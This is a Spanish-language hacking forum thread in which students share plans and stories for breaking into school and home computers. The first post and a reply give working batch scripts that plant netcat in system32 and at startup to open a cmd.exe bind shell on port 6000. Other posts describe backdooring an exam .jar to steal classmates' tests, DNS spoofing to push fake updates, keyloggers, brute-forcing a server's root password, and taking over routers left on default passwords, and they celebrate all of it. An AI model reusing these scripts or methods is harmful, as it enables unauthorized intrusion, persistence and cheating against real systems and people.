Foro de elhacker.net

Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.

Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).

NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).


Bueno empiezo con el mío:

14 computadoras (corriendo windows), en red (cable :P), una maquina server (windows server 2000)

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.

1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida

ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse

pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).

ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.

lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta

2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.

@echo off
copy "D:\Misdoc\fede\intrusion escuela\base.bat" "%userprofile%\Men£ Inicio\Programas\Inicio\"
exit

simplemente eso.

3º archivo:ejecucion de un archivo (netcat a la escucha)

@echo off
start nc.exe -L -d -e cmd.exe -p 6000
exit

simplemente eso.

Diagrama:


Como pueden ver es muy sencillo, programitas programados en batch.

si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.

asique decidi hacerlo por partes.

bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje :D y lo pruebo.

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.


PD: tengo 14 años dentro de todo esta bien jajaja
saludos

yo tampoco soy un experto pero si corregidme si me equivoco XD. Para tenerlo todo en un archivo lo puesto asi...

  @echo off
copy "c:\nc.exe" "c:\WINDOWS\system32\"
cd "c:\WINDOWS\system32\"
copy "c:\WINDOWS\system32\nc.exe" "%userprofile%\Men£ Inicio\Programas\Inicio\"
cd\
start nc.exe -L -d -e cmd.exe -p 6000
exit

Tu code no estaría mal si el nc.exe ya estaria en algun directorio, pero el problema es que el netcat en mi caso no lo estaba, entonces use el quick batch compiler, lo inclui (es una opcion que tiene el qbfc), y entonces use

@echo off
copy %MYFILES%\nc.exe %systemroot%\system32

no es necesario poner change directory, porque al estar en system32, se ejecuta desde alli y no es necesario

despues el otro copy si esta bien

start nc.exe -L -d -e cmd.exe -p 6000

esto tambien esta bien, pero acordate que no es necesario poner cd porque por eso se lo paso a system32, para no tener que cambiar de directorio

saludos!

PD:comenten si les gusto la idea, seria un buen intercambio de difierentes tipso de intrusiones, en diferentes escenarios con diferentes restricciones y posibilidades.

Como que la seguridad no existe por acá. :o

El netcat no es reconocido por el nod 32 (no salta, en el escanneo si lo hace)

saludos!

A lo que se refiere es que para poder meter en nc en esa carpeta necesitas permisos de Admin, y que esten habilitados en un salon es malo ... ahora, con respecto a tu método, aún no lo entiendo, quién ejecuta que cosa y de que manera? XD, tu metes esos archivos en una carpeta compartida?

Saludos

Yo estoy jodido en mi escuela, ya que tienen el deep freeze última versión que sólo jodé el fdf boteable... Además sería mucho daño sólo para jugar :) lo que sí me gustaría hacer es joder el PC con Windows server que tiene instalado oracle para así ver como lo instalan de nuevo y aprender bien de forma práctica xD pero en mi vida he usado Windows server por lo tanto ni hablar de programar algo para joderlo

aca estoy, jaja, em es asi la cosa, osea yo tengo una carpeta, que NO es necesario ser admin para manejarlas y modificarlas, osea no hay casi nada de seguridad.

entonces por ejemplo yo si quiero puedo modificarle el nombre de la carpeta, puedo manejar los archivos, modificarlos, casi todo se puede hacer  ;-) :laugh:

entonces tengo que tener acceso fisico a cada una de las pc, y lo tengo, entonces me dirijo a la carpeta compartida que anteriormente había colocado los archivos, voy rapidamente sin que nadie se entere y ejecuto los dos archivos en su respectivo orden.

si funciona lo voy a comentar.

saludos

no se olviden, que es mejorable mucho mas, y por favor diganlo jajja, esa es la ideaa

y si tienen algun metodo posteenlo

saludoos

El otro día puse en keylogger muy simple en el portatil de mi cole. El caso es que tenía autologin como administrador (windows xp), así que puse en la carpeta inicio un keylogger ejecutable muy simple que lo que hace es guardar los logs en system32.

Nah, es por lammear un poco, si de verdad estuviera interesado haría que me mandara los logs por ftp o algo, pero me da pereza... que vago soy... xD

jaja, si alguien tienem as anecdotas, no se olviden de contarla!

saludos

yo estoy en el proyecto con fede, vamos al mismo colegio, y el problema es el firewall de windows, que si uno trata de hacerlo lo mas "disimulado" posible, la vieja de elsa ( la profe, yo la banco;))se te da cuenta, yo una vez lew empece a abrir cosas a unas amigas, y en una le mando un mensjae,: "sale un aprono?" y me dicen, (sabian que era yo porq m,e acerq a su pc) "dale dale!", y sus palabras son ordenes, era asiel refran?, y le abri rubias19 y se dio cuenta y empezo a tomar oral de no se q de power point la vieja, flasheo mal. pero lo que me diverti esa clase, esos 40 minutos semanales, no tiene nombre. el 10/11/08 fue la primera vez qu me cruce con una computadora, acto del dia de la tradicion (argentina) con fede_cp adentro del aula mientras todos estaban despistados, windows 98, poniendo de bootlogo una foto chota de paint. jajajja! si hay una droga que te haga reir o divertir mas que los cigarros de la risa, es la pc!

que recuerdos tomi, posta que nos cagamos de risa en informatica, encima es una gordita ñoña que habla como si fuese a tirarse un re PEd@, ajjaja


bueno por favor si alguien tiene alguna anecdota asi, cuentenla, aparte de la parte tecnica, los resultados

saludos

Algo similar hice yo en mi instituto, en lugar de dejar el codigo del programa que teniamos que entregar, deje el ejecutable en la carpeta compartida, que no solo contenia el ejercicio  :rolleyes:

5 minutos y obtuve la shell remota del profesor con una conexion inversa (netcat ftw!)

Ni me moleste en hacer algo para que se auto-conectase, paso de meterme en lios xD

Oye, ¿y el profesor no te dice que qué estás haciendo o algo? xD

xD
la clase de programacion en mi instituto es de 3 horas seguidas, las computadoras no son muy novedosas devido a que solo las usan para compilar cosas censillas, todas las pc's del aula usan xp sp2 con ie6, y de las 3 horas 1 la usan para navegar en internet y las otras para hacer los programas, entonces simplemente hago un Mitm y spoffeo la conexión al google.com con un exploit en local, a los 4 minutos ya tego shell remota xD

bueno, aca voy a contar como me fue, el plan salio genial todo en su lugar, el unico problema es que para joder a la profe (ya tenia masomenos 6 pc) empeze a volverla loca, hasta que me vio con el cmd, y me dijo que esta haciendo, y le meti un re chamuyo (sabe menos que yo de informatica jajaj), y despues al final de la clase, se entero porque ya era obvio, y me dijo si entras de nuevo a los sitemas te voy a tener que sancionar, y bueno esa fue mi gran hazaña jajaja. a ver si a castg no lo descubren, esatamos en la mismo escuela.



saludos!

los cuento en mi salon donde se ve informatica habian 20 cumputadoras conectadas por lan todas usaban linux , para infectarlas todas hice esto ( como todos programabamos en java y algunos examn eran .jar en mi examn le agregue un modulo que abriera un puerto en el sistema  para poder aceder a la shell :laugh: , entonces entregue mi examn y la profe lo ejecuto en la maquina principal(Linux)  :xD :-X  una ves que lo hizo esa maquina la controle para sakar los examenes de los demas por la shell  mientras entregaban yo los revisaba y los copiaba xd  .jaja sake puro 20 en las siguientes 4 semanas  xd: :laugh:

SALUDOS.!!

ajjaja, que buena idea, esto esta bueno siempre y cuando se presente como se hizo (la base).


saludos!

jajaj que loco

Yo tengo otro plan  que haré cuando empiece a ver informática (3º trimestre):xD

Haré un MITM (con una versión de ettercap portable)  y  un DNS spoofing y lo dirigiré a mi maquina (de clase). Como webserver me llevaré uno muy simple programado por mí en C++ que lo único que haga sea mostrar una página que diga que tiene que actualizar no se que cosa (ya me inventaré algo, no saben nada de informática) y que se descarguen el archivo que enlazo. El archivo será cualquiera que me permita hacer algo gracioso :xD
Como el profesor de tecnología es buena gente igual hasta se lo digo y se lo hago a otra persona cualquiera como demostración de que hay que ser precavido con la información que se encuentra en internet.
Si encuentro algún exploit que funcione bien para IE6 hago eso en vez de todo el resto :xD

jajaja genial, buena idea la de la actualizacion!


saludos y a ver que se les ocurre!

saludos

El profe va a su bola xD

Jajaj divertido es un rato, yo estoy estudiando administracion de sistemas informaticos, y saque la clave de admin de uno de los pc's, y el administrador era tan tonto que puso esa clave para todo, entonces, me conecte al server como admin, oh sorpresa archivos que no deberia ver... (no eran examenes no os emocioneis), pero habia unos pdf's con todas las mac's de los alumnos, las macs de los profes, y las ip's de los switches, se lo enseñe a mi profe de redes, y nos conectamos a el switch de aquella planta, y como el controla mucho mas que yo, me dijo, cierra este puerto, muy bien, acabas de dejar sin internet a las 2 primeras aulas, ahora cierra este, muy bien acabas de dejar sin internet a toda la planta, ahora ese, pues ahora has dejado sin internet a los profes.
Despues me puse la mac de un profe y me conecte a la wifi de la sala de profes (no hice ninguna cafrada, estoy pagando una pasta por este curso como para que me expulsen), por ultimo me conecte con putty al server y admin y la contraseña y padentro, pero no pude probar cosillas ni quitar el capador de web's que tienen porque necessitaba la contraseña root y ya no me mate para conseguirla.
En el mismo pdf de los switches tenian el de los puntos de acceso, y ale, agregar mac's de los compañeros, iphones, algun profe tambien etc, sabiendo la ip y el user y pass regalado.
Y despues lo tipico, control remoto entre pcs de clase, bucles, cain&abel, y abrirle la calculadora y cosas asi en medio de la explicacion con el proyector jaja.
Un saludo.

jajaj! quiero estar en tu colegio! en el mio lo unico que tenemos sera, un windows xp que recien lo pusieron, porq antes teniaoms 98  :-(, como mucho hay un photoshop en alguna pc loca para... nose que curso esta viendo diseño grafico xD! jajajaj. che y una pregunta de un buen noob en redes xD! con que herramienta, programa, en que lenguaje o cosa rara cerraste los puertos? a mi me parece raro ya cerrar los mios XD! si alguien me ayuda con esto? me quedan 40 minutos de informatica este jueves y el que vienes y VACAS! jajjaja

hombre... es un insti que cada curso son 4000€... como para que no se lo curren, en la 4a planta que es la de los ciclos, hay 40pcs por aula, 5 aulas, mas la sala de profes, el server que alli suben archivos y tal (NO EXAMENES NO SON TAN ESTUPIDOS), este server tiene todos los servicios, ftp, dns etc, tienen alli la web, el gic que es como un moodle, y demas cosas, amen de juegos que los subimos nosotros jaja.
Lo de cerrar los puertos, es porque son Switches HP con acceso ip e interficie grafica, es como conectarte por web a tu router pero envez de router un switch, y alli te salen todos los puertos, con el trafico, los que estan conectados y tal, pero claro tienes que saber cual tocar, y en eso me ayudo mi profe de redes jeje, amen que despues lo dejamos todo igual.
Jaja y ahora que me acuerdo, el profe que llevaba el mantenimiento (un enxufado porque de informatico poco, es economista), un dia se quedo todo pillado, porque vio nosecuantos intentos de acceso al server claro yo ahi probando combinaciones para el root, pero no paso nada porque no sabe ni mirar la mac que lo intento (estamos en dhcp).

Yo descubrí una vulnerabilidad (RFI) en la web del Home Banking de un banco de acá, asi que si quisiera podria hacer phishing o carding a mi antojo, y tambien hasta colar un shell, pero la verdad que me interesa mas dominar el puto Slackaware  :laugh:

Generalmente no disfruto hacer maldades, pero mas de una vez eh ingresado al ZyXEL p-600 de mi conocidos, aca en mi pequeña ciudad Speedy (Telefonica)le da ese routers a todos, y todos con la misma contraseña y con el remote-admin habilitada, asi que solo me hes cuestion de obtener IP's (con una 'imagen' generada en php que en relidad es un simple script  que guarda el ip en un bb.dd). Asi que yo a cualquiera de aca le digo "che mira esta foto" y a cada uno le paso un ID unico por GET, asi se luego (a los pocos segundos) de quien es esa IP, y no me queda ams que entrar y hacer lo que se me plasca con su router  :laugh:

Pero nunca he hecho nada malo, me lo tengo reservado como posible venganza por algo en el futuro  :-*

Saludos

No obviamente, no romper nada, volver loco al profe de informatica si, pero romper no, ni borrar.


saludos!

Que no? borrar todo! pura venganza ARGENTINA RATA! TE VAMOS A ENTRAR FRENTE PARA LA VICTORIA! CHAU bbdd, todavia no conocen el Hacktivism, vengaza, los argentinos se revelaran de manera intelectual por mayor!

¬¬  >:(

La verdad que hoy poy hoy en Argentina (con la nueva ley de medios)al meterse con el Estado solo lograríamos ensuciar mas aun la reputacion de los hackers.  ;)

jaja, muy buen punto, yo no me meteria, o tal vez si, me meteria, pero no borraria la base de datos por tanta sea la bronca que tenga, che de que zona sos¿? a dario le pregnute lo mismo jajaja, esta bueno tener por aca amigos del foro, yo de la oeste, a! buenos aires. no mas datos jajajaj

Bonito chat!  :D

Saludos